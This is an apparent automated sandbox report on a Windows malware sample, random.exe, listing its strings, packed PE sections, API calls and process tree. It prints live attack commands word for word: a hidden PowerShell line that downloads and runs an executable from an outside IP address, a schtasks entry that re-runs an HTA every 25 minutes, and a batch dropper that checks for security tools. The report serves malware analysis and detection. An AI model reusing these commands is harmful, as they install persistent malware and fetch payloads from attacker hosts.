memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6d39ad4e-7
                                    Source: random.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_48c926e7-8
                                    Source: random.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_eb277e70-4
                                    Creates HTA files
                                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Temp\tmxzSk7p3.htaJump to behavior
                                    PE file contains section with special chars
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name:
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name: .idata
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name:
                                    Source: rapes.exe.11.drStatic PE information: section name:
                                    Source: rapes.exe.11.drStatic PE information: section name: .idata
                                    Source: rapes.exe.11.drStatic PE information: section name:
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name:
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name: .idata
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name:
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name:
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name: .idata
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name:
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name:
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name: .idata
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name:
                                    Source: CgmaT61.exe.14.drStatic PE information: section name:
                                    Source: CgmaT61.exe.14.drStatic PE information: section name: .idata
                                    Source: CgmaT61.exe.14.drStatic PE information: section name:
                                    Powershell drops PE file
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEJump to dropped file
                                    Wscript called in batch mode (surpress errors)
                                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess Stats: CPU usage > 49%
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0048D5EB
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00481201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00481201
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0048E8F6
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeFile created: C:\Windows\CombatTongue
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeFile created: C:\Windows\PracticeRoot
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeFile created: C:\Windows\PlatesRegister
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004920460_2_00492046
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004280600_2_00428060
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004882980_2_00488298
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0045E4FF0_2_0045E4FF
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0045676B0_2_0045676B
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004B48730_2_004B4873
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0042CAF00_2_0042CAF0
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0044CAA00_2_0044CAA0
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0043CC390_2_0043CC39
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00456DD90_2_00456DD9
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0043B1190_2_0043B119
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004291C00_2_004291C0
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004413940_2_00441394
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004417060_2_00441706
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0044781B0_2_0044781B
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0043997D0_2_0043997D
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004279200_2_00427920
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004419B00_2_004419B0
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00447A4A0_2_00447A4A
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00441C770_2_00441C77
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00447CA70_2_00447CA7
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004ABE440_2_004ABE44
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00459EEE0_2_00459EEE
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0042BF400_2_0042BF40
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00441F320_2_00441F32
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC2413_1_0021CC24
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021B03613_1_0021B036
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021960313_1_00219603
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_00120A4013_1_00120A40
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_000E3E8613_1_000E3E86
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_000A20BF13_1_000A20BF
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_002160E613_1_002160E6
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_002236F313_1_002236F3
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_002200C313_1_002200C3
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_000E4B0213_1_000E4B02
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_000A2D3113_1_000A2D31
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_00217B7F13_1_00217B7F
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_000A55AB13_1_000A55AB
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_002145E913_1_002145E9
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_000F99FB13_1_000F99FB
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_000361F014_2_000361F0
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_0003B70014_2_0003B700
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_00062C2014_2_00062C20
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_0007404714_2_00074047
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_0005B4C014_2_0005B4C0
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_000718D714_2_000718D7
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_00075CD414_2_00075CD4
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_000351A014_2_000351A0
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_00075DF414_2_00075DF4
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_0005F6DB14_2_0005F6DB
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_00034EF014_2_00034EF0
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_0021CC2414_1_0021CC24
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_0021B03614_1_0021B036
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_0021960314_1_00219603
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_00120A4014_1_00120A40
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_000E3E8614_1_000E3E86
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_000A20BF14_1_000A20BF
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_002160E614_1_002160E6
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_002236F314_1_002236F3
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_002200C314_1_002200C3
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_000E4B0214_1_000E4B02
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_000A2D3114_1_000A2D31
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_00217B7F14_1_00217B7F
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_000A55AB14_1_000A55AB
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_002145E914_1_002145E9
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_1_000F99FB14_1_000F99FB
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                    Source: C:\Users\user\Desktop\random.exeCode function: String function: 0043F9F2 appears 40 times
                                    Source: C:\Users\user\Desktop\random.exeCode function: String function: 00429CB3 appears 31 times
                                    Source: C:\Users\user\Desktop\random.exeCode function: String function: 00440A30 appears 46 times
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7856 -s 764
                                    Source: random.exe, 00000000.00000003.1165251199.0000000001772000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                                    Source: random.exe, 00000000.00000003.1167102753.00000000018B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                                    Source: random.exe, 00000000.00000003.1167102753.00000000018B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefaS vs random.exe
                                    Source: random.exe, 00000000.00000002.1171012712.0000000001779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                                    Source: random.exe, 00000000.00000003.1166073504.0000000001773000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                                    Source: random.exe, 00000000.00000003.1164387282.0000000001765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                                    Source: random.exe, 00000000.00000003.1167668940.0000000001776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                                    Source: random.exe, 00000000.00000003.1161904428.00000000018AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                                    Source: random.exe, 00000000.00000003.1161904428.00000000018AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefaS vs random.exe
                                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                    Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    Source: V0Bt74c[1].exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: V0Bt74c.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: PfOHmro[1].exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: PfOHmro.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: Section: ZLIB complexity 0.9989508006198347
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: Section: zmpqmbag ZLIB complexity 0.9940843995347485
                                    Source: rapes.exe.11.drStatic PE information: Section: ZLIB complexity 0.9989508006198347
                                    Source: rapes.exe.11.drStatic PE information: Section: zmpqmbag ZLIB complexity 0.9940843995347485
                                    Source: V0Bt74c[1].exe.14.drStatic PE information: Section: .CSS ZLIB complexity 1.0003352171985815
                                    Source: V0Bt74c.exe.14.drStatic PE information: Section: .CSS ZLIB complexity 1.0003352171985815
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
                                    Source: yUI6F6C.exe.14.drStatic PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
                                    Source: ADFoyxP[1].exe.14.drStatic PE information: Section: .reloc ZLIB complexity 1.002197265625
                                    Source: ADFoyxP.exe.14.drStatic PE information: Section: .reloc ZLIB complexity 1.002197265625
                                    Source: CgmaT61[1].exe.14.drStatic PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
                                    Source: CgmaT61.exe.14.drStatic PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
                                    Source: mAtJWNv[1].exe.14.drStatic PE information: Section: .css ZLIB complexity 0.9975900423728814
                                    Source: mAtJWNv.exe.14.drStatic PE information: Section: .css ZLIB complexity 0.9975900423728814
                                    Source: PfOHmro[1].exe.14.drStatic PE information: Section: .CSS ZLIB complexity 1.0003681282722514
                                    Source: PfOHmro.exe.14.drStatic PE information: Section: .CSS ZLIB complexity 1.0003681282722514
                                    Source: rapes.exe.11.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: yUI6F6C.exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: CgmaT61.exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: CgmaT61[1].exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: mAtJWNv[1].exe.14.dr, Ce716WgjPJi1to0DwO.csCryptographic APIs: 'CreateDecryptor'
                                    Source: mAtJWNv.exe.14.dr, Ce716WgjPJi1to0DwO.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@78/67@7/5
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004937B5 GetLastError,FormatMessageW,0_2_004937B5
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004810BF AdjustTokenPrivileges,CloseHandle,0_2_004810BF
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004816C3
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_004951CD
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004AA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004AA67C
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0049648E
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004242A2
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ReK7Ewx[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:568:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_03
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
                                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7856
                                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Temp\tmxzSk7p3.htaJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                                    Source: random.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: random.exeVirustotal: Detection: 48%
                                    Source: random.exeReversingLabs: Detection: 47%
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: " /add
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: " /add /y
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: " /add
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEString found in binary or memory: " /add /y
                                    Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: rapes.exeString found in binary or memory: " /add /y
                                    Source: rapes.exeString found in binary or memory: " /add
                                    Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: rapes.exeString found in binary or memory: " /add /y
                                    Source: rapes.exeString found in binary or memory: " /add
                                    Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
                                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
